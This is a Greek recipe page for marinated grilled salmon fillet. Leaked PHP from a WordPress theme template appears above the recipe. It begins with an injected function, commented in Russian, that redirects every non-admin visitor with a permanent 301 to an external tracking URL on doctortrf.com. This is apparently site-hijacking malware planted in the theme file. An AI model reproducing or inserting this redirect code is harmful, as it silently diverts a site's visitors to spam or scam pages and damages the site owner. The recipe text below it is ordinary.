function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Template part for displaying single post content in single.php * * @package Asona/Templates * @since 1.0 * @author apalodi */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly ?>

Ψημένο σολομός φιλέτο

Ψημένο σολομός φιλέτο
Ψημένο σολομός φιλέτο

Ψημένο σολομός φιλέτο με σκόρδο και φρέσκα μυρωδικά. Η μαρινάδα αποτελείται από ελαιόλαδο, σάλτσα σόγιας, μέλι, ξύσμα λεμονιού, μαϊντανό, θυμάρι, αλάτι, πιπέρι και σκόρδο. Αφού μαρινάρετε τον σολομό για λίγες ώρες, ψήνεται σε ζεστό τηγάνι γκριλ μέχρι να ψηθεί στην τελειότητα. Το αποτέλεσμα είναι ένα λαχταριστό πιάτο που παρουσιάζεται όμορφα και ολοκληρώνεται με τη μαρινάδα που έχει απομείνει.

Συστατικά:

  • 4 κομμάτια φιλέτα σολομού
  • 1/4 φλιτζανιού ελαιόλαδο
  • 1/4 φλιτζάνι σάλτσα σόγιας
  • 2 κουταλιές της σούπας μέλι
  • Ξύσμα από 1 λεμόνι
  • 2 κουταλιές της σούπας μαϊντανό ψιλοκομμένο
  • 1 κουταλιά της σούπας θυμάρι ψιλοκομμένο
  • Αλάτι και πιπέρι για να γευτείς
  • 4 σκελίδες σκόρδο, ψιλοκομμένες
  • Λάδι αβοκάντο (για ψήσιμο στη σχάρα)
  • Φέτες λεμονιού (για το σερβίρισμα)

Οδηγίες:

  1. Σε ένα μπολ ανακατεύουμε το ελαιόλαδο, τη σάλτσα σόγιας, το μέλι, το ξύσμα λεμονιού, τον ψιλοκομμένο μαϊντανό, το ψιλοκομμένο θυμάρι, το αλάτι, το πιπέρι και το ψιλοκομμένο σκόρδο. Ανακατεύουμε καλά να γίνει η μαρινάδα.
  2. Τοποθετούμε τα φιλέτα σολομού σε σακούλα Ziploc και τα περιχύνουμε με τη μαρινάδα. Κλείστε τη σακούλα και βεβαιωθείτε ότι ο σολομός έχει επικαλυφθεί ομοιόμορφα. Αφήνουμε τον σολομό να μαριναριστεί στο ψυγείο για 2-3 ώρες.
  3. Αφού μαρινάρετε, αφαιρέστε τον σολομό από τη σακούλα και πετάξτε τα περιττά μυρωδικά και το σκόρδο για να μην καούν κατά τη διάρκεια του ψησίματος.
  4. Προθερμάνετε ένα τηγάνι γκριλ σε μέτρια προς δυνατή φωτιά και αλείψτε το με λάδι αβοκάντο για να μην κολλήσει.
  5. Τοποθετήστε τα φιλέτα σολομού, με την πέτσα προς τα κάτω, στο ζεστό τηγάνι γκριλ. Τα αφήνουμε να ψηθούν χωρίς να κουνηθούν για περίπου 4-5 λεπτά. Αυτό θα επιτρέψει να σχηματιστεί ένα τραγανό δέρμα.
  6. Γυρίστε προσεκτικά τα φιλέτα σολομού χρησιμοποιώντας μια σπάτουλα και συνεχίστε το ψήσιμο στη σχάρα για άλλα 4-5 λεπτά ή μέχρι να ψηθεί ο σολομός και να ξεφλουδίσει εύκολα.
  7. Μόλις ψηθεί, μεταφέρετε τον ψητό σολομό σε πιατέλα σερβιρίσματος. Προαιρετικά: Στύψτε λίγο φρέσκο χυμό λεμονιού πάνω από τον σολομό για μεγαλύτερη φωτεινότητα.
  8. Σερβίρετε τον μαριναρισμένο σολομό ζεστό, γαρνιρισμένο με φρέσκα μυρωδικά και φέτες λεμονιού στο πλάι.
Ψημένο σολομός φιλέτο
Ψημένο σολομός φιλέτο

Απολαύστε τον γευστικό και τρυφερό μαριναρισμένο σολομό σας με σκόρδο και φρέσκα βότανα!

Leave a Reply

Your email address will not be published. Required fields are marked *